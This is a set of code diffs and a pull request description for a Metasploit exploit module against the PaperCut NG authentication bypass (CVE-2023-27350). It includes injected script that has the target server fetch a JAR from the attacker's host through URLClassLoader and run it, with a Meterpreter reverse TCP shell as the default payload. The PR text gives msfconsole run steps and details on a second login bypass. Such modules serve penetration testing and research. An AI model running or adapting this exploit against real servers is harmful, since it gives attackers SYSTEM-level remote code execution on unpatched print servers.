+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def bypass_auth
+    # Hit the SetupCompleted Page & establish an authenticated session.
+    # Return success/fail or vuln/not vuln based on response values
+  end
+
+  def set_server_option
+    # set name:value pair(s)
+    # 1) do a quickfind (setting the tapestry state)
+    # 2) if no property found, add it?
+    # 3) else, if necessary, do an update
+  end
+
+  def check
+    # For the check command
+  end
+
+  def exploit
+    # Main function
+  end
+end

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -35,7 +35,10 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [ 'catatonicprime' ],
         'References' => [
-          [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ]
+          [ 'URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219' ],
+          [ 'URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/' ],
+          [ 'URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'],
+          [ 'URL', 'https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software' ]
         ],
         'Targets' => [ [ 'Automatic Target', {}] ],
         'Platform' => [ 'java' ],

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'debug'
 require 'cgi'
 
 class MetasploitModule < Msf::Exploit::Remote
@@ -45,8 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'RPORT' => '9191',
-          'SSL' => 'false',
-          'HTTPDELAY' => 10
+          'SSL' => 'false'
         },
         'Notes' => {
           'Stability' => [CRASH_SAFE],

--- a/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
+++ b/modules/exploits/multi/http/papercut_ng_auth_bypass.rb
@@ -49,11 +49,9 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2023-03-13',
         'DefaultTarget' => 0,
         'DefaultOptions' => {
-          'DisablePayloadHandler' => true,
           'PAYLOAD' => 'java/meterpreter/reverse_tcp',
           'RPORT' => '9191',
           'SSL' => 'false',
-          'PAYLOAD_CLASS' => 'metasploit.Payload',
           'JAR_FILE' => '',
           'HTTPDELAY' => 10
         },
@@ -67,7 +65,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']),
-        OptString.new('PAYLOAD_CLASS', [false, 'Class containing main method to load']),
         OptInt.new('HTTPDELAY', [false, 'Path to the papercut application']),
         OptBool.new('NEVER_SET', [false, 'Never set server options to avoid unnecessary log events.'])
       ], self.class
@@ -110,8 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       }
     )
-    # TODO: 2) if no property found, add it?
-    # 3) parse the result
+    # 2) parse and return the result
     return nil unless res && res.code == 200 && html = res.get_html_document
     return nil unless td = html.xpath("//td[@class='propertyNameColumnValue']")
     return nil unless td.count == 1 && td.text == name
@@ -173,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'printerId' => 'l1001',
           'scriptBody' => %Q{
 var urls = [new java.net.URL("#{payload_uri}.jar")];
-var cl = new java.net.URLClassLoader(urls).loadClass('#{datastore['PAYLOAD_CLASS']}').newInstance().main([]);
+var cl = new java.net.URLClassLoader(urls).loadClass('metasploit.Payload').newInstance().main([]);
 s;
 }
         }
@@ -236,8 +232,7 @@ s;
 
   def on_request_uri(cli, request)
     vprint_status("Sending payload for requested uri: #{request.uri}")
-    jar_file = payload.raw
-    send_response(cli, jar_file)
+    send_response(cli, payload.raw)
   end
 
 end


### PR DESCRIPTION
This module uses a URLClassLoader to load java payloads into the papercut JVM. On Windows this generates sessions as SYSTEM, and on Linux it should generate less privileged shells as the 'papercut' user (haven't been able to test this yet).

## Verification

[edit: after many updates, this is the updated list for testing] List the steps needed to make sure this thing work:

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/papercut_ng_auth_bypass`
- [ ] `set PAYLOAD [java payload]`
- [ ] `set LHOST [ip]`
- [ ] `set RHOSTS [target]`
- [ ] `check`
- [ ] **Verify** check reports "Vulnerable"
- [ ] `run`
- [ ] **Verify** session is created

Video Demonstrating Success: https://youtu.be/hP60WJi5yzc

For information from PaperCut see [Papercut's Disclosure](https://www.papercut.com/kb/Main/PO-1216-and-PO-1219)

Some of the write-ups & PoCs seem to have missed that there are actually two login bypasses (this is not made clear in the original disclosure). One is where you use the Login Button (described by [Horizon3.ai Writeup](https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/)) This leads to a 'User "admin" logged into teh administration interface.' However, their analysis may have missed the BaseSetupPage class which also logs you in, automatically, as '[setup wizard]' (this is mentioned in the [Bleeping Computer Article](https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/).